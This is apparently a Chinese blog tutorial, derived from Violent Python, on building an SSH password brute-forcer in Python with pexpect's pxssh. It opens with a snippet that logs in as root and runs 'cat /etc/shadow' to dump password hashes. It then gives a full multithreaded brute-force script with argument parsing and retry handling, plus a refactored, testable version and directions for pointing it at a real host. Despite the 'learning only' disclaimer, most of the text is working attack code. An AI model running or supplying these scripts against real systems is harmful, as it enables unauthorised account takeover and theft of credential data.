Note: this article is for learning and discussion only; do not use it for illegal purposes.
Reference: 《Python絕技:運用Python成為頂級黑客》 (the Chinese edition of Violent Python).
Interacting with pxssh:
pxssh is a module that ships inside the Pexpect library (for installing Pexpect see the earlier post on the public account, 【Python黑客攻防(十一)用Pexpect與SSH交互】, "Python hacking offense and defense (11): interacting with SSH using Pexpect"). pxssh already provides login(), logout() and prompt() methods, so it can drive an SSH session directly.
<code>from pexpect import pxssh


def send_command(s, cmd):
    """Send one command over the established session and print its output."""
    s.sendline(cmd)
    s.prompt()            # wait for the shell prompt; the output is left in s.before
    print(s.before)


def connect(host, user, password):
    """Log in with pxssh and return the session, or exit on any failure."""
    try:
        s = pxssh.pxssh(encoding='utf-8')
        s.login(host, user, password)
        return s
    except Exception as e:
        print('[-] Error Connecting:', e)
        exit(0)


s = connect('192.168.1.14', 'root', '1')
send_command(s, 'cat /etc/shadow')
</code>
Modifying the code:
Modify the code so that the script can brute-force SSH passwords on its own. Apart from adding some argument parsing to read the hostname, the username and a file of candidate passwords, we only need a small change to the connect() function. If login() succeeds without raising an exception, we print a message saying the password has been found and set the global boolean Found to True. Otherwise we catch the exception. If the exception says the password was refused, we know this password is wrong and simply let the function return. But if the exception mentions the socket being in "read_nonblocking", the SSH server may be flooded with connections, so we wait a moment and try the same password again. Likewise, if the exception says pxssh had trouble synchronizing with the command prompt, we also wait briefly and retry. Note the boolean parameter release in connect(): because connect() can call another connect() recursively, only a connect() that was not invoked recursively by another connect() is allowed to release the connection_lock semaphore, otherwise one attempt would release more slots than it acquired. Two things to keep in mind: the retry branches key off the wording of pexpect's exception messages, so they silently stop retrying if that wording changes; and Found and Fails are plain globals written from worker threads, which is tolerable here only because each is written in one direction (set to True, incremented) and read solely to decide when to stop.
<code>from pexpect import pxssh
import optparse
import time
from threading import BoundedSemaphore, Thread

maxConnections = 5
connection_lock = BoundedSemaphore(value=maxConnections)
Found = False
Fails = 0


def connect(host, user, password, release):
    global Found
    global Fails
    try:
        s = pxssh.pxssh()
        s.login(host, user, password)
        print('[+] Password is: ' + password)
        Found = True
    except Exception as e:
        if 'read_nonblocking' in str(e):
            # socket timeout: the server is probably overloaded, wait and retry
            Fails += 1
            time.sleep(5)
            connect(host, user, password, False)
        elif 'synchronize with original prompt' in str(e):
            # pxssh could not find the shell prompt, wait briefly and retry
            time.sleep(1)
            connect(host, user, password, False)
        # any other exception (e.g. 'password refused') means a wrong password
    finally:
        # only the outermost (non-recursive) call releases the semaphore slot
        if release:
            connection_lock.release()


def main():
    parser = optparse.OptionParser('usage: %prog -H host -u username -f password_file')
    parser.add_option('-H', dest='host', type='string', help='specify target host')
    parser.add_option('-u', dest='username', type='string', help='target username')
    parser.add_option('-f', dest='file', type='string', help='specify password file')
    (options, args) = parser.parse_args()
    if options.host is None or options.username is None or options.file is None:
        parser.print_usage()
        exit(0)
    host = options.host
    username = options.username
    passwd_file = options.file
    fn = open(passwd_file, 'r')
    for line in fn.readlines():
        if Found:
            print('[*] Exiting: Password Found')
            exit(0)
        if Fails > 5:
            print('[!] Exiting: Too Many Socket Timeouts')
            exit(0)
        connection_lock.acquire()   # blocks until one of the maxConnections slots is free
        password = line.strip('\r').strip('\n')
        print('[-] Testing: ' + str(password))
        t = Thread(target=connect, args=(host, username, password, True))
        t.start()


if __name__ == '__main__':
    main()
</code>
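The retry-and-semaphore logic described above is hard to test without an SSH server in front of you. As an added example (not code from the original post or from the book), the block below reimplements the same idea with the login step injected as a callable: pxssh_login() is the adapter you would pass in against a real host, and make_fake_login() is a constructed stand-in that lets the whole loop run offline. Retries are done with a loop instead of recursion, so each worker thread holds exactly one semaphore slot for its lifetime and releases it exactly once. The host 192.0.2.10, the user name and the WORDLIST are made-up sample input.

```python
import threading
import time
from typing import Callable, Iterable, Optional

# Added example, not code from the original post or from Violent Python.


class AuthFailure(Exception):
    """The server rejected the credentials: move on to the next password."""


class TransientError(Exception):
    """Timeout or prompt-sync trouble: retry the same password after a pause."""


def pxssh_login(host: str, user: str, password: str, timeout: int = 10) -> None:
    """Adapter for a real target: maps pexpect/pxssh exceptions onto the two
    classes above. pexpect is imported lazily so the offline demo runs without it."""
    import pexpect
    from pexpect import pxssh
    s = pxssh.pxssh(timeout=timeout)
    try:
        s.login(host, user, password)
    except pexpect.TIMEOUT as e:          # what the book matches as 'read_nonblocking'
        raise TransientError(str(e)) from e
    except pxssh.ExceptionPxssh as e:
        if 'synchronize with original prompt' in str(e) or 'timeout' in str(e).lower():
            raise TransientError(str(e)) from e
        raise AuthFailure(str(e)) from e  # e.g. 'password refused'
    s.logout()


class SSHBruteForcer:
    def __init__(self, login: Callable[[str, str, str], None], max_connections: int = 5,
                 max_transient: int = 5, retry_delay: float = 0.0) -> None:
        self.login = login
        self.sem = threading.BoundedSemaphore(max_connections)  # book's connection_lock
        self.found = threading.Event()                           # book's Found flag
        self.lock = threading.Lock()                             # guards the counters below
        self.password: Optional[str] = None
        self.transient = 0                                       # book's Fails counter
        self.attempts = 0
        self.max_transient = max_transient
        self.retry_delay = retry_delay

    def _try(self, host: str, user: str, password: str) -> None:
        """Worker: retry on TransientError, give up on AuthFailure, stop once any
        thread has found the password. The semaphore slot is held across retries."""
        try:
            while not self.found.is_set():
                with self.lock:
                    self.attempts += 1
                try:
                    self.login(host, user, password)
                except AuthFailure:
                    return                                       # wrong password
                except TransientError:
                    with self.lock:
                        self.transient += 1
                        give_up = self.transient > self.max_transient
                    if give_up:
                        return
                    time.sleep(self.retry_delay)
                    continue                                     # same password, same slot
                with self.lock:
                    if self.password is None:                    # first success wins
                        self.password = password
                self.found.set()
                return
        finally:
            self.sem.release()                                   # exactly once per thread

    def run(self, host: str, user: str, passwords: Iterable[str]) -> Optional[str]:
        threads = []
        for password in passwords:
            if self.found.is_set() or self.transient > self.max_transient:
                break
            self.sem.acquire()                                   # wait for a free slot
            t = threading.Thread(target=self._try, args=(host, user, password))
            t.start()
            threads.append(t)
        for t in threads:
            t.join()
        return self.password


def make_fake_login(real_password: str, flaky: Iterable[str] = ()) -> Callable[[str, str, str], None]:
    """Constructed stand-in for pxssh_login: rejects everything except real_password
    and raises one TransientError the first time each password in `flaky` is tried."""
    flaky, flaked, lock = set(flaky), set(), threading.Lock()

    def login(host: str, user: str, password: str) -> None:
        with lock:
            first_flake = password in flaky and password not in flaked
            if first_flake:
                flaked.add(password)
        if first_flake:
            raise TransientError('Timeout exceeded in read_nonblocking()')
        if password != real_password:
            raise AuthFailure('password refused')

    return login


WORDLIST = ['123456', 'password', 'toor', 'kali', 'letmein']   # constructed sample


def demo():
    """Offline run: the correct password times out once before it is accepted."""
    bf = SSHBruteForcer(make_fake_login('kali', flaky={'kali'}), max_connections=2)
    return bf.run('192.0.2.10', 'root', WORDLIST), bf.transient


if __name__ == '__main__':
    print(demo())
```

Against a real host you would construct `SSHBruteForcer(pxssh_login)` and pass a wordlist read from disk; everything else stays the same, which is the point of keeping the login step pluggable.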
Test:
Here the target is the SSH service on the local Kali Linux machine itself, and the dictionary is one of the wordlists that ship with Kali Linux.